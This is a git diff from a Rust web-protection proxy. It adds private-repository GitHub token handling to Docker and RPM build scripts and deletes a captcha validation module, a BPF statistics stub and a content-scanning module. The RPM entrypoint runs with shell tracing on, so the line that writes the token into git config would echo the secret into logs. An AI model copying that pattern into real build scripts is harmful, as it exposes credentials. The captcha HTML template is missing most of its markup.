--global url."https://x-access-token:${GITHUB_TOKEN}@github.com/".insteadOf "https://github.com/" && \ + export CARGO_NET_GIT_FETCH_WITH_CLI=true; \ + else \ + echo "github_token: not provided (public deps only)"; \ + fi && \ + cargo build --release FROM gcr.io/distroless/cc-debian13 diff --git a/pkg/docker/build.Dockerfile b/pkg/docker/build.Dockerfile index 7f6eb0e..e284c53 100644 --- a/pkg/docker/build.Dockerfile +++ b/pkg/docker/build.Dockerfile @@ -49,7 +49,23 @@ WORKDIR /app COPY . . -RUN cargo build --release +# Private git deps: pass --secret id=github_token,env=GITHUB_TOKEN at build time. +# With REQUIRE_GITHUB_TOKEN=1, build fails if secret is missing or empty. +# Example: docker build --secret id=github_token,env=GITHUB_TOKEN -f pkg/docker/build.Dockerfile . +ARG REQUIRE_GITHUB_TOKEN=1 +RUN --mount=type=secret,id=github_token,required=false \ + if [ "$REQUIRE_GITHUB_TOKEN" = "1" ]; then \ + [ -f /run/secrets/github_token ] && [ -s /run/secrets/github_token ] || { echo "ERROR: REQUIRE_GITHUB_TOKEN=1 but github_token secret missing or empty. Pass: --secret id=github_token,env=GITHUB_TOKEN"; exit 1; }; \ + fi && \ + if [ -f /run/secrets/github_token ] && [ -s /run/secrets/github_token ]; then \ + echo "github_token: present" && \ + export GITHUB_TOKEN=$(tr -d '\n\r' < /run/secrets/github_token) && \ + git config --global url."https://x-access-token:${GITHUB_TOKEN}@github.com/".insteadOf "https://github.com/" && \ + export CARGO_NET_GIT_FETCH_WITH_CLI=true; \ + else \ + echo "github_token: not provided (public deps only)"; \ + fi && \ + cargo build --release # Create output directory and copy binary RUN mkdir -p /output && \ diff --git a/pkg/rpm/docker/entrypoint.sh b/pkg/rpm/docker/entrypoint.sh index b91f721..b26b806 100755 --- a/pkg/rpm/docker/entrypoint.sh +++ b/pkg/rpm/docker/entrypoint.sh @@ -4,6 +4,16 @@ set -xe ref=$1 +# Private git deps: pass -e GITHUB_TOKEN when running the container +export CARGO_NET_GIT_FETCH_WITH_CLI=true +if [ -n "${GITHUB_TOKEN:-}" ]; then + GITHUB_TOKEN=$(echo -n "$GITHUB_TOKEN" | tr -d '\n\r') + echo "github_token: present" + git config --global url."https://x-access-token:${GITHUB_TOKEN}@github.com/".insteadOf "https://github.com/" +else + echo "github_token: not provided (public deps only)" +fi + cd /tmp/repo/pkg/rpm ./builder.sh cp synapse-*.rpm /tmp/output/ diff --git a/src/actions/captcha.rs b/src/actions/captcha.rs deleted file mode 100644 index 74644a8..0000000 --- a/src/actions/captcha.rs +++ /dev/null @@ -1,1011 +0,0 @@ -use std::collections::HashMap; -use std::sync::Arc; -use std::time::{Duration, Instant}; - -use anyhow::{Context, Result}; -use chrono::Utc; -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use tokio::sync::{RwLock, OnceCell}; -use jsonwebtoken::{encode, decode, Header, Algorithm, Validation, EncodingKey, DecodingKey}; -use uuid::Uuid; - -use crate::redis::RedisManager; -use crate::http_client::get_global_reqwest_client; - -/// Captcha provider types supported by Gen0Sec -#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, clap::ValueEnum)] -pub enum CaptchaProvider { - #[serde(rename = "hcaptcha")] - HCaptcha, - #[serde(rename = "recaptcha")] - ReCaptcha, - #[serde(rename = "turnstile")] - Turnstile, -} - -impl Default for CaptchaProvider { - fn default() -> Self { - CaptchaProvider::HCaptcha - } -} - -impl std::str::FromStr for CaptchaProvider { - type Err = anyhow::Error; - - fn from_str(s: &str) -> Result { - match s.to_lowercase().as_str() { - "hcaptcha" => Ok(CaptchaProvider::HCaptcha), - "recaptcha" => Ok(CaptchaProvider::ReCaptcha), - "turnstile" => Ok(CaptchaProvider::Turnstile), - _ => Err(anyhow::anyhow!("Invalid captcha provider: {}", s)), - } - } -} - -/// Captcha validation request -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct CaptchaValidationRequest { - pub response_token: String, - pub ip_address: String, - pub user_agent: Option, - pub site_key: String, - pub secret_key: String, - pub provider: CaptchaProvider, -} - -/// Captcha validation response -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct CaptchaValidationResponse { - pub success: bool, - pub error_codes: Option>, - pub challenge_ts: Option, - pub hostname: Option, - pub score: Option, - pub action: Option, -} - -/// JWT Claims for captcha tokens -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct CaptchaClaims { - /// Standard JWT claims - pub sub: String, // Subject (user identifier) - pub iss: String, // Issuer - pub aud: String, // Audience - pub exp: i64, // Expiration time - pub iat: i64, // Issued at - pub jti: String, // JWT ID (unique identifier) - - /// Custom captcha claims - pub ip_address: String, - pub user_agent: String, - pub ja4_fingerprint: Option, - pub captcha_provider: String, - pub captcha_validated: bool, -} - -/// Captcha token with JWT-based security -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct CaptchaToken { - pub token: String, - pub claims: CaptchaClaims, -} - -/// Cached captcha validation result -#[derive(Debug, Clone)] -pub struct CachedCaptchaResult { - pub is_valid: bool, - pub expires_at: Instant, -} - -/// Captcha action configuration -#[derive(Debug, Clone)] -pub struct CaptchaConfig { - pub site_key: String, - pub secret_key: String, - pub jwt_secret: String, - pub provider: CaptchaProvider, - pub token_ttl_seconds: u64, - pub validation_cache_ttl_seconds: u64, -} - -/// Captcha client for validation and token management -pub struct CaptchaClient { - config: CaptchaConfig, - validation_cache: Arc>>, - validated_tokens: Arc>>, // JTI -> expiration time -} - -impl CaptchaClient { - pub fn new( - config: CaptchaConfig, - ) -> Self { - Self { - config, - validation_cache: Arc::new(RwLock::new(HashMap::new())), - validated_tokens: Arc::new(RwLock::new(HashMap::new())), - } - } - - /// Validate a captcha response token - pub async fn validate_captcha(&self, request: CaptchaValidationRequest) -> Result { - log::info!("Starting captcha validation for IP: {}, provider: {:?}", - request.ip_address, self.config.provider); - - // Check if captcha response is provided - if request.response_token.is_empty() { - log::warn!("No captcha response provided for IP: {}", request.ip_address); - return Ok(false); - } - - log::debug!("Captcha response token length: {}", request.response_token.len()); - - // Check validation cache first - let cache_key = format!("{}:{}", request.response_token, request.ip_address); - if let Some(cached) = self.get_validation_cache(&cache_key).await { - if cached.expires_at > Instant::now() { - log::debug!("Captcha validation for {} found in cache", request.ip_address); - return Ok(cached.is_valid); - } else { - self.remove_validation_cache(&cache_key).await; - } - } - - // Validate with provider API - let is_valid = match self.config.provider { - CaptchaProvider::HCaptcha => self.validate_hcaptcha(&request).await?, - CaptchaProvider::ReCaptcha => self.validate_recaptcha(&request).await?, - CaptchaProvider::Turnstile => self.validate_turnstile(&request).await?, - }; - - log::info!("Captcha validation result for IP {}: {}", request.ip_address, is_valid); - - // Cache the result - self.set_validation_cache(&cache_key, is_valid).await; - - Ok(is_valid) - } - - /// Generate a secure JWT captcha token - pub async fn generate_token( - &self, - ip_address: String, - user_agent: String, - ja4_fingerprint: Option, - ) -> Result { - let now = Utc::now(); - let exp = now + chrono::Duration::seconds(self.config.token_ttl_seconds as i64); - let jti = Uuid::new_v4().to_string(); - - let claims = CaptchaClaims { - sub: format!("captcha:{}", ip_address), - iss: "arxignis-synapse".to_string(), - aud: "captcha-validation".to_string(), - exp: exp.timestamp(), - iat: now.timestamp(), - jti: jti.clone(), - ip_address: ip_address.clone(), - user_agent: user_agent.clone(), - ja4_fingerprint, - captcha_provider: format!("{:?}", self.config.provider), - captcha_validated: false, - }; - - let header = Header::new(Algorithm::HS256); - let encoding_key = EncodingKey::from_secret(self.config.jwt_secret.as_bytes()); - - let token = encode(&header, &claims, &encoding_key) - .context("Failed to encode JWT token")?; - - let captcha_token = CaptchaToken { - token: token.clone(), - claims: claims.clone(), - }; - - // Store token in Redis for validation (optional, JWT is self-contained) - if let Ok(redis_manager) = RedisManager::get() { - let key = format!("{}:captcha_jwt:{}", redis_manager.create_namespace("captcha"), jti); - let mut redis = redis_manager.get_connection(); - let token_data = serde_json::to_string(&captcha_token) - .context("Failed to serialize captcha token")?; - - let _: () = redis - .set_ex(&key, token_data, self.config.token_ttl_seconds) - .await - .context("Failed to store captcha token in Redis")?; - } - - Ok(captcha_token) - } - - /// Validate a JWT captcha token - pub async fn validate_token(&self, token: &str, ip_address: &str, user_agent: &str) -> Result { - let decoding_key = DecodingKey::from_secret(self.config.jwt_secret.as_bytes()); - let mut validation = Validation::new(Algorithm::HS256); - validation.set_audience(&["captcha-validation"]); - - match decode::(token, &decoding_key, &validation) { - Ok(token_data) => { - let claims = token_data.claims; - - // Check if token is expired (JWT handles this automatically, but double-check) - let now = Utc::now().timestamp(); - if claims.exp < now { - log::debug!("JWT token expired"); - return Ok(false); - } - - // Verify IP and User-Agent binding - if claims.ip_address != ip_address || claims.user_agent != user_agent { - log::warn!("JWT token validation failed: IP or User-Agent mismatch"); - return Ok(false); - } - - // Check Redis first for updated token state - let mut captcha_validated = claims.captcha_validated; - log::debug!("Initial JWT token captcha_validated: {}", captcha_validated); - - // Check in-memory cache first (faster) - { - let validated_tokens = self.validated_tokens.read().await; - if let Some(expiration) = validated_tokens.get(&claims.jti) { - if *expiration > Instant::now() { - captcha_validated = true; - log::debug!("Found validated token JTI {} in memory cache", claims.jti); - } else { - log::debug!("Token JTI {} expired in memory cache", claims.jti); - } - } - } - - // If not found in memory cache, check Redis - if !captcha_validated { - if let Ok(redis_manager) = RedisManager::get() { - let key = format!("{}:captcha_jwt:{}", redis_manager.create_namespace("captcha"), claims.jti); - log::debug!("Looking up token in Redis with key: {}", key); - - let mut redis = redis_manager.get_connection(); - match redis.get::<_, String>(&key).await { - Ok(token_data_str) => { - log::debug!("Found token data in Redis: {}", token_data_str); - if let Ok(updated_token) = serde_json::from_str::(&token_data_str) { - captcha_validated = updated_token.claims.captcha_validated; - log::debug!("Updated captcha_validated from Redis: {}", captcha_validated); - - // Update memory cache if found in Redis - if captcha_validated { - let expiration = Instant::now() + Duration::from_secs(self.config.token_ttl_seconds); - let mut validated_tokens = self.validated_tokens.write().await; - validated_tokens.insert(claims.jti.clone(), expiration); - } - } else { - log::warn!("Failed to parse token data from Redis"); - } - } - Err(e) => { - log::debug!("Redis token lookup failed for JTI {}: {}", claims.jti, e); - } - } - } else { - log::debug!("Redis manager not available"); - } - } - - // Check if captcha was validated (either from JWT or Redis) - if !captcha_validated { - log::debug!("JWT token not validated for captcha"); - return Ok(false); - } - - // Optional: Check Redis blacklist for revoked tokens - if let Ok(redis_manager) = RedisManager::get() { - let blacklist_key = format!("{}:captcha_blacklist:{}", redis_manager.create_namespace("captcha"), claims.jti); - let mut redis = redis_manager.get_connection(); - match redis.exists::<_, bool>(&blacklist_key).await { - Ok(true) => { - log::debug!("JWT token {} is blacklisted", claims.jti); - return Ok(false); - } - Ok(false) => { - // Token not blacklisted, continue validation - } - Err(e) => { - log::warn!("Redis blacklist check error for JWT {}: {}", claims.jti, e); - // Continue validation despite Redis error - } - } - } - - Ok(true) - } - Err(e) => { - log::warn!("JWT token validation failed: {}", e); - Ok(false) - } - } - } - - /// Mark a JWT token as validated after successful captcha completion - pub async fn mark_token_validated(&self, token: &str) -> Result<()> { - let decoding_key = DecodingKey::from_secret(self.config.jwt_secret.as_bytes()); - let mut validation = Validation::new(Algorithm::HS256); - validation.set_audience(&["captcha-validation"]); - - match decode::(token, &decoding_key, &validation) { - Ok(token_data) => { - let claims = token_data.claims; - - // Store the JTI as validated in memory cache - let expiration = Instant::now() + Duration::from_secs(self.config.token_ttl_seconds); - { - let mut validated_tokens = self.validated_tokens.write().await; - validated_tokens.insert(claims.jti.clone(), expiration); - log::debug!("Marked token JTI {} as validated, expires at {:?}", claims.jti, expiration); - } - - // Also update Redis cache if available (for persistence across restarts) - if let Ok(redis_manager) = RedisManager::get() { - let key = format!("{}:captcha_jwt:{}", redis_manager.create_namespace("captcha"), claims.jti); - log::debug!("Storing updated token in Redis with key: {}", key); - - let mut redis = redis_manager.get_connection(); - let mut updated_claims = claims.clone(); - updated_claims.captcha_validated = true; - - let updated_captcha_token = CaptchaToken { - token: token.to_string(), - claims: updated_claims, - }; - let token_data = serde_json::to_string(&updated_captcha_token) - .context("Failed to serialize updated captcha token")?; - - log::debug!("Token data to store: {}", token_data); - - let _: () = redis - .set_ex(&key, token_data, self.config.token_ttl_seconds) - .await - .context("Failed to update captcha token in Redis")?; - - log::debug!("Successfully stored updated token in Redis"); - } else { - log::debug!("Redis manager not available for token storage"); - } - - Ok(()) - } - Err(e) => { - log::warn!("Failed to decode JWT token for validation marking: {}", e); - Err(anyhow::anyhow!("Invalid JWT token: {}", e)) - } - } - } - - /// Revoke a JWT token by adding it to blacklist - pub async fn revoke_token(&self, token: &str) -> Result<()> { - let decoding_key = DecodingKey::from_secret(self.config.jwt_secret.as_bytes()); - let mut validation = Validation::new(Algorithm::HS256); - validation.set_audience(&["captcha-validation"]); - - match decode::(token, &decoding_key, &validation) { - Ok(token_data) => { - let claims = token_data.claims; - - // Add to Redis blacklist - if let Ok(redis_manager) = RedisManager::get() { - let blacklist_key = format!("{}:captcha_blacklist:{}", redis_manager.create_namespace("captcha"), claims.jti); - let mut redis = redis_manager.get_connection(); - let _: () = redis - .set_ex(&blacklist_key, "revoked", self.config.token_ttl_seconds) - .await - .context("Failed to add token to blacklist")?; - } - - Ok(()) - } - Err(e) => { - log::warn!("Failed to decode JWT token for revocation: {}", e); - Err(anyhow::anyhow!("Invalid JWT token: {}", e)) - } - } - } - - /// Apply captcha challenge (return HTML form) - pub fn apply_captcha_challenge(&self, site_key: &str) -> String { - self.render_captcha_template(site_key, None) - } - - /// Apply captcha challenge with JWT token (return HTML form) - pub fn apply_captcha_challenge_with_token(&self, site_key: &str, jwt_token: &str) -> String { - self.render_captcha_template(site_key, Some(jwt_token)) - } - - /// Render captcha template based on provider - fn render_captcha_template(&self, site_key: &str, jwt_token: Option<&str>) -> String { - let (frontend_js, frontend_key, callback_attr) = match self.config.provider { - CaptchaProvider::HCaptcha => ( - "https://js.hcaptcha.com/1/api.js", - "h-captcha", - "data-callback=\"captchaCallback\"" - ), - CaptchaProvider::ReCaptcha => ( - "https://www.recaptcha.net/recaptcha/api.js", - "g-recaptcha", - "data-callback=\"captchaCallback\"" - ), - CaptchaProvider::Turnstile => ( - "https://challenges.cloudflare.com/turnstile/v0/api.js", - "cf-turnstile", - "data-callback=\"onTurnstileSuccess\" data-error-callback=\"onTurnstileError\"" - ), - }; - - let jwt_token_input = if let Some(token) = jwt_token { - format!(r#""#, token) - } else { - r#""#.to_string() - }; - - let html_template = format!( - r#" - - - Gen0Sec Captcha - - - - - - -
-
-

Gen0Sec Captcha

-

Please complete the security verification below to continue.

-
- -
-
-
-
- - {} -
- - -
- - - -"#, - frontend_js, - frontend_key, - site_key, - callback_attr, - jwt_token_input - ); - html_template - } - - /// Validate with hCaptcha API - async fn validate_hcaptcha(&self, request: &CaptchaValidationRequest) -> Result { - // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; - - let mut params = HashMap::new(); - params.insert("response", &request.response_token); - params.insert("secret", &request.secret_key); - params.insert("sitekey", &request.site_key); - params.insert("remoteip", &request.ip_address); - - log::info!("hCaptcha validation request - response_length: {}, remote_ip: {}", - request.response_token.len(), request.ip_address); - - let response = client - .post("https://hcaptcha.com/siteverify") - .form(¶ms) - .send() - .await - .context("Failed to send hCaptcha validation request")?; - - log::info!("hCaptcha validation HTTP response - status: {}", response.status()); - - if !response.status().is_success() { - log::error!("hCaptcha service returned non-success status: {}", response.status()); - return Ok(false); - } - - let validation_response: CaptchaValidationResponse = response - .json() - .await - .context("Failed to parse hCaptcha response")?; - - if !validation_response.success { - if let Some(error_codes) = &validation_response.error_codes { - for error_code in error_codes { - match error_code.as_str() { - "invalid-input-secret" => { - log::error!("hCaptcha secret key is invalid"); - return Ok(false); - } - "invalid-input-response" => { - log::info!("Invalid hCaptcha response from user"); - return Ok(false); - } - "timeout-or-duplicate" => { - log::info!("hCaptcha response expired or duplicate"); - return Ok(false); - } - _ => { - log::warn!("hCaptcha validation failed with error code: {}", error_code); - } - } - } - } - log::info!("hCaptcha validation failed without specific error code"); - return Ok(false); - } - - Ok(true) - } - - /// Validate with reCAPTCHA API - async fn validate_recaptcha(&self, request: &CaptchaValidationRequest) -> Result { - // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; - - let mut params = HashMap::new(); - params.insert("response", &request.response_token); - params.insert("secret", &request.secret_key); - params.insert("remoteip", &request.ip_address); - - log::info!("reCAPTCHA validation request - response_length: {}, remote_ip: {}", - request.response_token.len(), request.ip_address); - - let response = client - .post("https://www.recaptcha.net/recaptcha/api/siteverify") - .form(¶ms) - .send() - .await - .context("Failed to send reCAPTCHA validation request")?; - - log::info!("reCAPTCHA validation HTTP response - status: {}", response.status()); - - if !response.status().is_success() { - log::error!("reCAPTCHA service returned non-success status: {}", response.status()); - return Ok(false); - } - - let validation_response: CaptchaValidationResponse = response - .json() - .await - .context("Failed to parse reCAPTCHA response")?; - - if !validation_response.success { - if let Some(error_codes) = &validation_response.error_codes { - for error_code in error_codes { - match error_code.as_str() { - "invalid-input-secret" => { - log::error!("reCAPTCHA secret key is invalid"); - return Ok(false); - } - "invalid-input-response" => { - log::info!("Invalid reCAPTCHA response from user"); - return Ok(false); - } - "timeout-or-duplicate" => { - log::info!("reCAPTCHA response expired or duplicate"); - return Ok(false); - } - _ => { - log::warn!("reCAPTCHA validation failed with error code: {}", error_code); - } - } - } - } - log::info!("reCAPTCHA validation failed without specific error code"); - return Ok(false); - } - - Ok(true) - } - - /// Validate with Cloudflare Turnstile API - async fn validate_turnstile(&self, request: &CaptchaValidationRequest) -> Result { - // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; - - let mut params = HashMap::new(); - params.insert("response", &request.response_token); - params.insert("secret", &request.secret_key); - params.insert("remoteip", &request.ip_address); - - log::info!("Turnstile validation request - response_length: {}, remote_ip: {}", - request.response_token.len(), request.ip_address); - - let response = client - .post("https://challenges.cloudflare.com/turnstile/v0/siteverify") - .form(¶ms) - .send() - .await - .context("Failed to send Turnstile validation request")?; - - log::info!("Turnstile validation HTTP response - status: {}", response.status()); - - if !response.status().is_success() { - log::error!("Turnstile service returned non-success status: {}", response.status()); - return Ok(false); - } - - let validation_response: CaptchaValidationResponse = response - .json() - .await - .context("Failed to parse Turnstile response")?; - - if !validation_response.success { - if let Some(error_codes) = &validation_response.error_codes { - for error_code in error_codes { - match error_code.as_str() { - "invalid-input-secret" => { - log::error!("Turnstile secret key is invalid"); - return Ok(false); - } - "invalid-input-response" => { - log::info!("Invalid Turnstile response from user"); - return Ok(false); - } - "timeout-or-duplicate" => { - log::info!("Turnstile response expired or duplicate"); - return Ok(false); - } - _ => { - log::warn!("Turnstile validation failed with error code: {}", error_code); - } - } - } - } - log::info!("Turnstile validation failed without specific error code"); - return Ok(false); - } - - Ok(true) - } - - /// Get the captcha backend response key name for the current provider - pub fn get_captcha_backend_key(&self) -> &'static str { - match self.config.provider { - CaptchaProvider::HCaptcha => "h-captcha-response", - CaptchaProvider::ReCaptcha => "g-recaptcha-response", - CaptchaProvider::Turnstile => "cf-turnstile-response", - } - } - - /// Get validation result from cache - async fn get_validation_cache(&self, key: &str) -> Option { - let cache = self.validation_cache.read().await; - cache.get(key).cloned() - } - - /// Set validation result in cache - async fn set_validation_cache(&self, key: &str, is_valid: bool) { - let mut cache = self.validation_cache.write().await; - cache.insert( - key.to_string(), - CachedCaptchaResult { - is_valid, - expires_at: Instant::now() + Duration::from_secs(self.config.validation_cache_ttl_seconds), - }, - ); - } - - /// Remove validation result from cache - async fn remove_validation_cache(&self, key: &str) { - let mut cache = self.validation_cache.write().await; - cache.remove(key); - } - - /// Clean up expired cache entries - pub async fn cleanup_cache(&self) { - let mut cache = self.validation_cache.write().await; - let now = Instant::now(); - cache.retain(|_, cached| cached.expires_at > now); - - // Also clean up expired validated tokens - let mut validated_tokens = self.validated_tokens.write().await; - validated_tokens.retain(|_, expiration| *expiration > now); - } -} - -/// Global captcha client instance -static CAPTCHA_CLIENT: OnceCell> = OnceCell::const_new(); - -/// Initialize the global captcha client -pub async fn init_captcha_client( - config: CaptchaConfig, -) -> Result<()> { - let client = Arc::new(CaptchaClient::new(config)); - - CAPTCHA_CLIENT.set(client) - .map_err(|_| anyhow::anyhow!("Failed to initialize captcha client"))?; - - Ok(()) -} - -/// Validate captcha response -pub async fn validate_captcha_response( - response_token: String, - ip_address: String, - user_agent: Option, -) -> Result { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - let request = CaptchaValidationRequest { - response_token, - ip_address, - user_agent: user_agent, - site_key: client.config.site_key.clone(), - secret_key: client.config.secret_key.clone(), - provider: client.config.provider.clone(), - }; - - client.validate_captcha(request).await -} - -/// Generate captcha token -pub async fn generate_captcha_token( - ip_address: String, - user_agent: String, - ja4_fingerprint: Option, -) -> Result { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - client.generate_token(ip_address, user_agent, ja4_fingerprint).await -} - -/// Validate captcha token -pub async fn validate_captcha_token( - token: &str, - ip_address: &str, - user_agent: &str, -) -> Result { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - client.validate_token(token, ip_address, user_agent).await -} - -/// Apply captcha challenge -pub fn apply_captcha_challenge() -> Result { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - Ok(client.apply_captcha_challenge(&client.config.site_key)) -} - -/// Apply captcha challenge with JWT token -pub fn apply_captcha_challenge_with_token(jwt_token: &str) -> Result { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - Ok(client.apply_captcha_challenge_with_token(&client.config.site_key, jwt_token)) -} - -/// Get the captcha backend response key name -pub fn get_captcha_backend_key() -> Result<&'static str> { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - Ok(client.get_captcha_backend_key()) -} - -/// Mark a JWT token as validated after successful captcha completion -pub async fn mark_captcha_token_validated(token: &str) -> Result<()> { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - client.mark_token_validated(token).await -} - -/// Revoke a JWT token -pub async fn revoke_captcha_token(token: &str) -> Result<()> { - let client = CAPTCHA_CLIENT - .get() - .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - - client.revoke_token(token).await -} - -/// Validate captcha response and mark token as validated -pub async fn validate_and_mark_captcha( - response_token: String, - jwt_token: String, - ip_address: String, - user_agent: Option, -) -> Result { - log::info!("validate_and_mark_captcha called for IP: {}, response_token length: {}, jwt_token length: {}", - ip_address, response_token.len(), jwt_token.len()); - - // First validate the captcha response - let is_valid = validate_captcha_response(response_token, ip_address.clone(), user_agent.clone()).await?; - - log::info!("Captcha validation result: {}", is_valid); - - if is_valid { - // Only try to mark JWT token as validated if it's not empty - if !jwt_token.is_empty() { - if let Err(e) = mark_captcha_token_validated(&jwt_token).await { - log::warn!("Failed to mark JWT token as validated: {}", e); - // Don't return false here - captcha validation succeeded - } else { - log::info!("Captcha validated and JWT token marked as validated for IP: {}", ip_address); - } - } else { - log::info!("Captcha validated successfully for IP: {} (no JWT token to mark)", ip_address); - } - } else { - log::warn!("Captcha validation failed for IP: {}", ip_address); - } - - Ok(is_valid) -} - -/// Start periodic cache cleanup task -pub async fn start_cache_cleanup_task() { - tokio::spawn(async { - let mut interval = tokio::time::interval(Duration::from_secs(60)); - loop { - interval.tick().await; - if let Some(client) = CAPTCHA_CLIENT.get() { - client.cleanup_cache().await; - } - } - }); -} diff --git a/src/actions/mod.rs b/src/actions/mod.rs deleted file mode 100644 index 9f4c525..0000000 --- a/src/actions/mod.rs +++ /dev/null @@ -1 +0,0 @@ -pub mod captcha; diff --git a/src/bpf_stats_noop.rs b/src/bpf_stats_noop.rs deleted file mode 100644 index db34e09..0000000 --- a/src/bpf_stats_noop.rs +++ /dev/null @@ -1,236 +0,0 @@ -use std::collections::HashMap; -use std::sync::Arc; - -use chrono::{DateTime, Utc}; -use serde::{Deserialize, Serialize}; - -use crate::bpf::FilterSkel; - -/// BPF statistics collected from kernel-level access rule enforcement -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct BpfAccessStats { - pub timestamp: DateTime, - pub total_packets_processed: u64, - pub total_packets_dropped: u64, - pub ipv4_banned_hits: u64, - pub ipv4_recently_banned_hits: u64, - pub ipv6_banned_hits: u64, - pub ipv6_recently_banned_hits: u64, - pub tcp_fingerprint_blocks_ipv4: u64, - pub tcp_fingerprint_blocks_ipv6: u64, - pub drop_rate_percentage: f64, - pub dropped_ip_addresses: DroppedIpAddresses, -} - -/// Statistics about dropped IP addresses -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct DroppedIpAddresses { - pub ipv4_addresses: HashMap, - pub ipv6_addresses: HashMap, - pub total_unique_dropped_ips: u64, -} - -/// Individual event for a dropped IP address -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct DroppedIpEvent { - pub event_type: String, - pub timestamp: DateTime, - pub ip_address: String, - pub ip_version: IpVersion, - pub drop_count: u64, - pub drop_reason: DropReason, -} - -/// IP version enumeration -#[derive(Debug, Clone, Serialize, Deserialize)] -pub enum IpVersion { - IPv4, - IPv6, -} - -/// Reason for dropping packets -#[derive(Debug, Clone, Serialize, Deserialize)] -pub enum DropReason { - AccessRules, - RecentlyBannedUdp, - RecentlyBannedIcmp, - RecentlyBannedTcpFinRst, -} - -/// Collection of dropped IP events -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct DroppedIpEvents { - pub timestamp: DateTime, - pub events: Vec, - pub total_events: u64, - pub unique_ips: u64, -} - -impl BpfAccessStats { - pub fn empty() -> Self { - Self { - timestamp: Utc::now(), - total_packets_processed: 0, - total_packets_dropped: 0, - ipv4_banned_hits: 0, - ipv4_recently_banned_hits: 0, - ipv6_banned_hits: 0, - ipv6_recently_banned_hits: 0, - tcp_fingerprint_blocks_ipv4: 0, - tcp_fingerprint_blocks_ipv6: 0, - drop_rate_percentage: 0.0, - dropped_ip_addresses: DroppedIpAddresses { - ipv4_addresses: HashMap::new(), - ipv6_addresses: HashMap::new(), - total_unique_dropped_ips: 0, - }, - } - } - - /// Create a summary string for logging - pub fn summary(&self) -> String { - format!( - "BPF Stats: {} packets processed, {} dropped ({:.2}%), {} unique IPs dropped", - self.total_packets_processed, - self.total_packets_dropped, - self.drop_rate_percentage, - self.dropped_ip_addresses.total_unique_dropped_ips - ) - } -} - -impl DroppedIpEvent { - pub fn new( - ip_address: String, - ip_version: IpVersion, - drop_count: u64, - drop_reason: DropReason, - ) -> Self { - Self { - event_type: "dropped_ips".to_string(), - timestamp: Utc::now(), - ip_address, - ip_version, - drop_count, - drop_reason, - } - } - - pub fn to_json(&self) -> Result { - serde_json::to_string(self) - } - - pub fn summary(&self) -> String { - format!( - "IP Drop Event: {} {:?} dropped {} times (reason: {:?})", - self.ip_address, - self.ip_version, - self.drop_count, - self.drop_reason - ) - } -} - -impl DroppedIpEvents { - pub fn new() -> Self { - Self { - timestamp: Utc::now(), - events: Vec::new(), - total_events: 0, - unique_ips: 0, - } - } - - pub fn add_event(&mut self, event: DroppedIpEvent) { - self.events.push(event); - self.total_events += 1; - } - - pub fn to_json(&self) -> Result { - serde_json::to_string(self) - } - - pub fn summary(&self) -> String { - format!( - "Dropped IP Events: {} events from {} unique IPs", - self.total_events, - self.unique_ips - ) - } - - pub fn get_top_dropped_ips(&self, limit: usize) -> Vec { - let mut events = self.events.clone(); - events.sort_by(|a, b| b.drop_count.cmp(&a.drop_count)); - events.into_iter().take(limit).collect() - } -} - -/// Statistics collector for BPF access rules -#[derive(Clone)] -pub struct BpfStatsCollector { - _skels: Vec>>, - enabled: bool, -} - -impl BpfStatsCollector { - pub fn new(skels: Vec>>, enabled: bool) -> Self { - Self { _skels: skels, enabled } - } - - pub fn set_enabled(&mut self, enabled: bool) { - self.enabled = enabled; - } - - pub fn is_enabled(&self) -> bool { - self.enabled - } - - pub fn collect_stats(&self) -> Result, Box> { - Ok(Vec::new()) - } - - pub fn collect_aggregated_stats(&self) -> Result> { - Ok(BpfAccessStats::empty()) - } - - pub fn log_stats(&self) -> Result<(), Box> { - Ok(()) - } - - pub fn collect_dropped_ip_events(&self) -> Result> { - Ok(DroppedIpEvents::new()) - } - - pub fn log_dropped_ip_events(&self) -> Result<(), Box> { - Ok(()) - } - - pub fn reset_dropped_ip_counters(&self) -> Result<(), Box> { - Ok(()) - } -} - -/// Configuration for BPF statistics collection -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct BpfStatsConfig { - pub enabled: bool, - pub log_interval_secs: u64, -} - -impl Default for BpfStatsConfig { - fn default() -> Self { - Self { - enabled: true, - log_interval_secs: 60, - } - } -} - -impl BpfStatsConfig { - pub fn new(enabled: bool, log_interval_secs: u64) -> Self { - Self { - enabled, - log_interval_secs, - } - } -} diff --git a/src/bpf_stub.rs b/src/bpf_stub.rs index 6957e7d..fd34010 100644 --- a/src/bpf_stub.rs +++ b/src/bpf_stub.rs @@ -7,7 +7,15 @@ pub struct FilterSkel<'a> { impl<'a> FilterSkel<'a> { pub fn new() -> Self { - Self { _marker: PhantomData } + Self { + _marker: PhantomData, + } + } +} + +impl<'a> Default for FilterSkel<'a> { + fn default() -> Self { + Self::new() } } diff --git a/src/content_scanning/mod.rs b/src/content_scanning/mod.rs deleted file mode 100644 index b607526..0000000 --- a/src/content_scanning/mod.rs 